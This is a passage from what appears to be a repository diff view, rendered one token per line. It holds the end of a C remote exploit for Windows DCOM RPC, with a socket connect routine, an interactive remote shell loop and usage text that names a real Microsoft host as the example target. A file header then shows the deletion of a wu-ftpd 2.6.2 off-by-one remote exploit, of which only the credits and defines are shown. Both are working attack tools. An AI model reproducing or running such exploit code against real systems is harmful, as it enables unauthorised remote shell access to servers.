conn_port_nm
)
{
int
sock
;
struct
hostent
*
sxp
;
struct
sockaddr_in
sxp_addr
;
if
((
sxp
=
gethostbyname
(
conn_host_nm
))
==
NULL
)
{
herror
(
" [-] gethostbyname() error"
);
return
(
-
1
);
}
if
((
sock
=
socket
(
AF_INET
,
SOCK_STREAM
,
0
))
==-
1
)
{
perror
(
" [-] socket() error"
);
return
(
-
1
);
}
sxp_addr
.
sin_family
=
AF_INET
;
sxp_addr
.
sin_port
=
htons
(
conn_port_nm
);
sxp_addr
.
sin_addr
=*
((
struct
in_addr
*
)
sxp
->
h_addr
);
bzero
(
&
(
sxp_addr
.
sin_zero
),
8
);
if
(
connect
(
sock
,(
struct
sockaddr
*
)
&
sxp_addr
,
sizeof
(
struct
sockaddr
))
==-
1
)
{
perror
(
" [-] connect() error"
);
return
(
-
1
);
}
return
(
sock
);
}
void
start_shell
(
int
st_sock_va
)
{
int
died
;
char
*
command
=
"cd C:
\\
& echo Wow, are u hacker now ?!
\n
"
;
char
readbuf
[(
GET_SZ
)];
fd_set
rset
;
memset
((
char
*
)
readbuf
,
0
,
sizeof
(
readbuf
));
fprintf
(
stdout
,
" [!] Executed shell successfully !
\n\n
"
);
send
(
st_sock_va
,
command
,
strlen
(
command
),
0
);
for
(;;)
{
fflush
(
stdout
);
FD_ZERO
(
&
rset
);
FD_SET
(
st_sock_va
,
&
rset
);
FD_SET
(
STDIN_FILENO
,
&
rset
);
select
(
st_sock_va
+
1
,
&
rset
,
NULL
,
NULL
,
NULL
);
if
(
FD_ISSET
(
st_sock_va
,
&
rset
))
{
died
=
read
(
st_sock_va
,
readbuf
,
sizeof
(
readbuf
)
-
1
);
if
(
died
<=
0
)
exit
(
0
);
readbuf
[
died
]
=
0
;
fprintf
(
stdout
,
"%s"
,
readbuf
);
}
if
(
FD_ISSET
(
STDIN_FILENO
,
&
rset
))
{
died
=
read
(
STDIN_FILENO
,
readbuf
,
sizeof
(
readbuf
)
-
1
);
if
(
died
>
0
)
{
readbuf
[
died
]
=
0
;
write
(
st_sock_va
,
readbuf
,
died
);
}
}
}
return
;
}
void
re_connt_lm
(
int
st_sock_va
)
{
if
(
st_sock_va
==-
1
)
{
fprintf
(
stdout
,
" [-] Failed.
\n\n
"
);
fprintf
(
stdout
,
" Happy Exploit ! :-)
\n\n
"
);
exit
(
-
1
);
}
}
void
pri_usg
(
char
*
f_nm
)
{
int
r_rn
=
0
;
fprintf
(
stdout
,
" Usage: %s -option [argument]
\n\n
"
,
f_nm
);
fprintf
(
stdout
,
"
\t
-h [hostname] - target host.
\n
"
);
fprintf
(
stdout
,
"
\t
-t [number] - select target number.
\n\n
"
);
fprintf
(
stdout
,
" Select target number>
\n\n
"
);
for
(;;)
{
if
(
__pt_pkg_form
[
r_rn
].
op_pk_num
==
(
0x82
))
break
;
else
{
fprintf
(
stdout
,
"
\t
{%d} %s
\n
"
,
__pt_pkg_form
[
r_rn
].
op_pk_num
,
__pt_pkg_form
[
r_rn
].
op_pk_str
);
}
r_rn
++
;
}
fprintf
(
stdout
,
"
\n
Exmaple> %s -h korea.microsoft.com -t3
\n\n
"
,
f_nm
);
exit
(
0
);
}
void
pri_banrl
()
{
fprintf
(
stdout
,
"
\n
DCOM RPC WIN32 remote exploit (Most languages)
\n\n
"
);
}
/* eox */
tools/0x82-wu262.c
deleted
100755 → 0
View file @
8c67185a
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** August 3, Brute-Force function addition.
** --
** Thank you.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100)
/* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"